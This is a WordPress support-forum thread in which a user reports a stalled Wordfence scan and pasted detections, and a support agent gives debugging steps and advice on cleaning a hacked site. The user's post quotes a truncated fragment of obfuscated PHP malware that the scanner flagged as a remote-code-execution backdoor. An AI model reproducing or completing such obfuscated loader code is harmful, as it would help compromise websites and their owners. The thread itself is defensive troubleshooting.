Wordfence Scan

  • Resolved dantediego

    (@dantediego)


    1 year, 6 months ago

    hi, I scanned with Wordfence, but it didn’t finish the scan showing the error:

    It appears that the current scan failed. His last status update was 5 minutes ago. you can keep waiting in case it resumes or stop and restart the scan. some sites may require tweaking to scan reliably.

    I made the recommended changes:

    Stop the existing scan if it is still running (the “Start new scan” button turns into a “Stop” button while the scan is running).
    Go to Wordfence > Scanning > Manage Scanning and locate the “Performance Options” section. Set “Maximum execution time for each scan step” to 20.
    Select “Save Changes”.
    Go to the Tools > Diagnostics page.
    In the “Debug Options” section, select “Enable debug mode”.
    If “Start scan remotely” is selected, deselect this option.
    Select “Save Changes”.
    Start a new scan on the Scan page.

    I currently match 156 results, the errors are:

    • Not a core file, theme or plugin from www.ads-software.com.
      Details: This file appears to have been installed or modified by a hacker to perform malicious activity. If you know this file you can choose to ignore it to exclude it from future scans. The corresponding text in this file is: <?php $lgwoso/*qyqi */=/*oiip */’lgwoso’ ^/*xixyo */’\x0f\x0f\x05′;\x0a\x0a\x0a$gugcjwn /* hkv /=\x09″f”.”i”.”l”.”e”.$lgwoso(95)/o /. $lgwoso(140-28)/q /./ ufy /”u”.”t”.$lgwoso(95) ./ pa */…

    The problem type is: Obfuscated:PHP/cudnew.rce.8819
    Description: Execute code similar to Remote Code Execution and other malware

    • This file is in a main WordPress location but is not distributed with this version of WordPress. This scan often includes leftover files from an older version of WordPress, but it could also find files added by another plugin, files added by your host, or malicious files added by an attacker

    how can i solve this problem?

    The page I need help with: [log in to see the link]

Viewing 1 replies (of 1 total)
  • Plugin Support wfjanet

    (@wfjanet)

    Hi?@dantediego,

    Thank you for reaching out.

    Please do the following for me. This will help me see exactly what is happening when the scan fails.

    • Go to the Wordfence > Tools > Diagnostics page
    • In the “Debugging Options” section check the circle “Enable debugging mode” 
    • Click to “Save Changes”.
    • CANCEL any current scan and start a NEW scan
    • Copy the last 20 lines from the Log (click the “Show Log” link) or so of the activity log once the scan finishes and paste them in this post.

    Wordfence > Tools > Diagnostic > Debugging Screenshot

    From the scan results, your site is compromised. You can clean the site by using the following guide: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ 

    Make sure and get all your plugins and themes updated and update WordPress core, too. As a rule, any time I think someone’s site has been compromised, I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this because attack vectors around your hosting or database environments are outside of Wordfence’s influence as an endpoint firewall.

    Additionally, you might find the WordPress Malware Removal section in our Learning Center helpful: https://wordfence.com/learn/ 

    If you’re unable to clean this on your own, there are paid services that will do it for you. Wordfence offers one and there are others. Per the forum rules, we’re not allowed to discuss Premium here, but please reach out to us at presales @ wordfence . com if you have any questions about it.

    Regardless, if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks,

    Janet

Viewing 1 replies (of 1 total)
  • The topic ‘Wordfence Scan’ is closed to new replies.